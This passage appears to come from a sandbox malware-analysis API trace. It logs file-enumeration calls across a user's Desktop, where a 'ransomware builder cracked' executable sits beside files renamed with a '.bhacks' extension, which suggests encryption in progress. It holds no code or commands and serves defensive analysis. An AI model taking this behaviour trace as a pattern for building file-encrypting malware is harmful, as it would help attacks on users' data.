ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0064.717] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bee40 [0064.717] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.717] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0064.717] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0064.717] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0064.717] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0064.718] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0064.718] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0064.718] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 1 [0064.718] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0064.718] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0064.718] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 1 [0064.718] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0064.719] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0064.719] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0064.719] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0064.719] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0064.719] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0064.719] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0064.720] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 1 [0064.720] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38e7c380, ftCreationTime.dwHighDateTime=0x1d5d648, ftLastAccessTime.dwLowDateTime=0xe93bdd60, ftLastAccessTime.dwHighDateTime=0x1d5d4c8, ftLastWriteTime.dwLowDateTime=0xe93bdd60, ftLastWriteTime.dwHighDateTime=0x1d5d4c8, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi", cAlternateFileName="")) returned 1 [0064.720] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b79f760, ftCreationTime.dwHighDateTime=0x1d5d23a, ftLastAccessTime.dwLowDateTime=0x3cfbbf90, ftLastAccessTime.dwHighDateTime=0x1d5c9db, ftLastWriteTime.dwLowDateTime=0x3cfbbf90, ftLastWriteTime.dwHighDateTime=0x1d5c9db, nFileSizeHigh=0x0, nFileSizeLow=0xfb6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi", cAlternateFileName="J_GUXI~1.AVI")) returned 1 [0064.720] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 1 [0064.720] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 1 [0064.720] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0064.720] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0064.721] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a2940, ftCreationTime.dwHighDateTime=0x1d5d2ed, ftLastAccessTime.dwLowDateTime=0xbbd52910, ftLastAccessTime.dwHighDateTime=0x1d5c822, ftLastWriteTime.dwLowDateTime=0xbbd52910, ftLastWriteTime.dwHighDateTime=0x1d5c822, nFileSizeHigh=0x0, nFileSizeLow=0xb5e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4", cAlternateFileName="NYVW1N~1.MP4")) returned 1 [0064.721] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0064.721] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0064.721] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b6f190, ftCreationTime.dwHighDateTime=0x1d5d631, ftLastAccessTime.dwLowDateTime=0x1cebe780, ftLastAccessTime.dwHighDateTime=0x1d5d024, ftLastWriteTime.dwLowDateTime=0x1cebe780, ftLastWriteTime.dwHighDateTime=0x1d5d024, nFileSizeHigh=0x0, nFileSizeLow=0x7bd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi", cAlternateFileName="TAB3I0~1.AVI")) returned 1 [0064.721] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0064.721] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0064.722] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 1 [0064.722] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb154e40, ftCreationTime.dwHighDateTime=0x1d5ce80, ftLastAccessTime.dwLowDateTime=0x71f710b0, ftLastAccessTime.dwHighDateTime=0x1d5d263, ftLastWriteTime.dwLowDateTime=0x71f710b0, ftLastWriteTime.dwHighDateTime=0x1d5d263, nFileSizeHigh=0x0, nFileSizeLow=0xa113, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4", cAlternateFileName="")) returned 1 [0064.722] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0064.722] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0064.722] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0064.722] FindClose (in: hFindFile=0x9bee40 | out: hFindFile=0x9bee40) returned 1 [0064.722] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.png", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0064.723] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be840 [0064.723] FindNextFileW (in: hFindFile=0x9be840, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.723] FindNextFileW (in: hFindFile=0x9be840, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0064.723] FindNextFileW (in: hFindFile=0x9be840, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0064.724] FindNextFileW (in: hFindFile=0x9be840, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x0, dwReserved1=0x0, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0064.724] FindNextFileW (in: hFindFile=0x9be840, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x0, dwReserved1=0x0, 